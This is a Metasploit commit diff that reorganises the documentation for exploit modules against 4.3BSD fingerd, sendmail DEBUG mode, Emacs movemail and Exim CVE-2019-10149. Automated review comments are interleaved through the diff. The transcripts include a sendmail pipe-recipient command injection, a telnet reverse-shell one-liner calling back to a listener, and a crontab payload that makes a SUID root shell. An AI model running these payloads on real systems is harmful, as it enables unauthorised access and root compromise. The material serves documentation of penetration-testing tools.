
Land #12889, Add OpenSMTPD MAIL FROM RCE

adfoster-r7 committed Feb 7, 2020
2 parents 6b48337 + 8c07e17 commit 4dcb2fbd963580c85f604df1efd19c9f73e2d0de
@@ -1,10 +1,13 @@
## Introduction
## Vulnerable Application

### Description

This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
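Review bot: demoting `## Setup` to `### Setup` under the new `## Vulnerable Application` heading is safe for the `[Setup](#setup)` link this change adds further down, since GitHub derives the anchor from the heading text rather than its level; while this paragraph is being restructured, the kept context line "exploited by the Morris worm in 1988-11-02" should read "on 1988-11-02".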
@@ -14,14 +17,18 @@ For manual setup, please follow the Computer History Wiki's
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets
### Targets

```
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**RPORT**
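Review bot: the new Verification Steps section is only two cross-references, and its `[Scenarios](#scenarios)` link depends on `## Usage` being renamed to `## Scenarios` later in this same file, so it should be checked after rebases; the Metasploit doc template expects enumerated steps here, and the transcript below already supplies them, e.g. `use exploit/bsd/finger/morris_fingerd_bof`, `set rhosts 127.0.0.1` / `set lhost 192.168.56.1`, then `run`, with `whoami` returning `nobody` as the check.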
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a BSD VAX payload. Currently only
Set this to a BSD VAX payload. Currently, only
`bsd/vax/shell_reverse_tcp` is supported.

## Usage
## Scenarios

### `fingerd` 5.1 on 4.3BSD

```
msf5 exploit(bsd/finger/morris_fingerd_bof) > options
msf5 > use exploit/bsd/finger/morris_fingerd_bof
msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
Module options (exploit/bsd/finger/morris_fingerd_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 79 yes The target port (TCP)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (bsd/vax/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
LHOST yes The listen address (an interface may be specified)
msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600
whoami
nobody
who am i
nobody tty?? Feb 6 13:45
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
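Review bot: switching the transcript from `options` to `show missing` drops the `RPORT 79` line and the `Exploit target:` block, yet the RPORT option text directly above this hunk says the port may need forwarding under SLiRP NAT in SIMH; consider keeping one `options` listing, or stating the default port 79 in the RPORT paragraph, so a reader knows which port to forward. The `[-] Current shell` style of failure is not relevant here, but the `who am i` output `nobody tty?? Feb 6 13:45` is worth a one-line remark that the shell runs as the unprivileged `fingerd` user, which is the expected post-exploitation context for this target.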
@@ -2,7 +2,7 @@

Exim 4.87 - 4.91 Local Privilege Escalation

This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).
This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).

Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.

@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
## ForceExploit

Force exploit even if the current session is root.

## SendExpectTimeout

Timeout per send/expect when communicating with exim.
## ExpectTimeout

Timeout for Expect when communicating with exim.

## WritableDir

@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
```
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
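Review bot: the repeated `meterpreter >`, `Background session 1? [y/N]` and `use exploit/linux/local/exim4_deliver_message_priv_esc` lines are identical before and after, which again points to a whitespace-only change inside the fenced transcript; fine to land, but whitespace edits inside a code fence can alter what a reader copies, so a quick diff with `-w` to confirm nothing else moved would be reassuring.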
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
[*] Started reverse TCP handler on 192.168.0.50:13371
[*] Started reverse TCP handler on 192.168.0.50:13371
[*] Payload sent, wait a few seconds...
[*] Sending stage (985320 bytes) to 192.168.0.80
[*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
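Review bot: the `Started reverse TCP handler on 192.168.0.50:13371` line is unchanged in content, so this is the third whitespace-only hunk in the Exim doc; nothing to fix, just noting that all three should be mentioned as cosmetic in the PR description so the change is not mistaken for an update to the documented behaviour.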
@@ -1,10 +1,13 @@
## Introduction
## Vulnerable Application

### Description

This module exploits a SUID installation of the Emacs `movemail` utility
to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.

The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.

## Setup
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
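Review bot: the heading restructure matches the other 4.3BSD docs in this landing, and the `#setup` anchor survives the `## Setup` to `### Setup` demotion because it is built from the heading text; the `### Description` paragraph could add one sentence on the precondition the Scenario later demonstrates, namely that `movemail` must be installed SUID root (the transcript reports `SUID-root /etc/movemail found`), so readers understand why the MOVEMAIL option exists.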
@@ -14,14 +17,18 @@ For manual setup, please follow the Computer History Wiki's
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets
### Targets

```
Id Name
-- ----
0 /usr/lib/crontab.local
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**MOVEMAIL**
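Review bot: as in the fingerd doc, Verification Steps here is only links and the `[Scenarios](#scenarios)` target is created by a later hunk in this file; since this is a local exploit, the enumerated steps should include obtaining a session first, e.g. `use exploit/unix/local/emacs_movemail`, `set session -1`, `run`, then waiting at least one minute and checking `ls -l /tmp/sh`, all of which the transcript below already shows.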
@@ -34,28 +41,40 @@ If your payload is `cmd/unix/generic` (suggested default), set this to
the command you want to run as root. The provided default will create a
SUID-root shell at `/tmp/sh`.

## Usage
## Scenarios

### 4.3BSD

```
msf5 > use exploit/unix/local/emacs_movemail
msf5 exploit(unix/local/emacs_movemail) > show missing
Module options (exploit/unix/local/emacs_movemail):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (cmd/unix/generic):
Name Current Setting Required Description
---- --------------- -------- -----------
msf5 exploit(unix/local/emacs_movemail) > set session -1
session => -1
msf5 exploit(unix/local/emacs_movemail) > run
[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
[*] Current shell is /bin/sh
[-] Current shell is unknown
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
[+] SUID-root [redacted] found
[+] SUID-root /etc/movemail found
[*] Preparing crontab with payload
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
[*] Creating writable /usr/lib/crontab.local
[+] Writing crontab to /usr/lib/crontab.local
[!] Please wait at least one minute for effect
[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/emacs_movemail) > sessions -1
[*] Starting interaction with 1...
ls -l /usr/lib/crontab.local /tmp/sh
/usr/lib/crontab.local not found
-rwsr-xr-x 1 root 23552 Nov 22 15:17 /tmp/sh
/tmp/sh -c whoami
root
msf5 exploit(unix/local/emacs_movemail) >
```
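Review bot: the updated transcript shows `[-] Current shell is unknown` on a run that still succeeds, and a reader will take the `[-]` prefix as a failure; either explain in the doc that an unknown shell is non-fatal because the module sets its own `$PATH` (as the `Setting a sane $PATH` line indicates), or have the module print it as `[!]`. The `[*] Exploit completed, but no session was created.` line also deserves a sentence saying that this is expected with `cmd/unix/generic`, because the root shell appears as `/tmp/sh` after the cron run rather than as a new session, which the `sessions -1` follow-up then demonstrates.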
@@ -1,12 +1,14 @@
## Introduction
## Vulnerable Application

### Description

This module exploits `sendmail`'s well-known historical debug mode to
escape to a shell and execute commands in the SMTP `RCPT TO` command.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
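Review bot: "escape to a shell and execute commands in the SMTP `RCPT TO` command" could be tightened to state that the historical `DEBUG` command makes sendmail accept a pipe as the recipient (the transcript later sends `RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">`), which is the actual mechanism a defender would want to recognise; the kept context line should also read "on 1988-11-02" rather than "in 1988-11-02".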
@@ -16,14 +18,18 @@ For manual setup, please follow the Computer History Wiki's
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets
### Targets

```
Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**RPORT**
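Review bot: same remark as for the other two docs in this landing, the `[Scenarios](#scenarios)` link only resolves once `## Usage` becomes `## Scenarios` below, and the section should enumerate steps rather than link out; the transcript provides them: `use exploit/unix/smtp/morris_sendmail_debug`, `set rhosts 127.0.0.1` and `set lhost 192.168.56.1`, then `run`, with the expected verification being a `cmd/unix/reverse` session rather than the `whoami` check used in the fingerd doc.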
@@ -33,62 +39,66 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a Unix command payload. Currently only `cmd/unix/reverse`
Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
and `cmd/unix/generic` are supported.

## Usage
## Scenarios

### `sendmail` 5.51 on 4.3BSD

```
msf5 exploit(unix/smtp/morris_sendmail_debug) > options
msf5 > use exploit/unix/smtp/morris_sendmail_debug
msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing
Module options (exploit/unix/smtp/morris_sendmail_debug):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 25 yes The target port (TCP)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86
LHOST yes The listen address (an interface may be specified)
msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > run
[*] Started reverse TCP double handler on 192.168.1.5:4444
[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
[*] 127.0.0.1:25 - Expecting: /200 Debug set/
[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Expecting: /250 Ok/
[*] 127.0.0.1:25 - Sending: QUIT
[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zqhqKJD7trW0E0Lp;
[*] Command: echo ISj759F8jEik4HAW;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zqhqKJD7trW0E0Lp\r\n"
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
[*] B is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you
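Review bot: the transcript keeps the lines `[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"`, which are the telnet banner being read by `sh` on the victim side and are harmless, but without a note a reader will assume part of the exploit failed; one sentence after the fence explaining this, and that the `[*] Matching...` / `[*] A is input...` lines are the double-handler pairing the two telnet connections, would make the Scenario much easier to follow. Also, as with the fingerd doc, switching from `options` to `show missing` hides `RPORT 25`, which the RPORT text above says may need SLiRP forwarding in SIMH.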
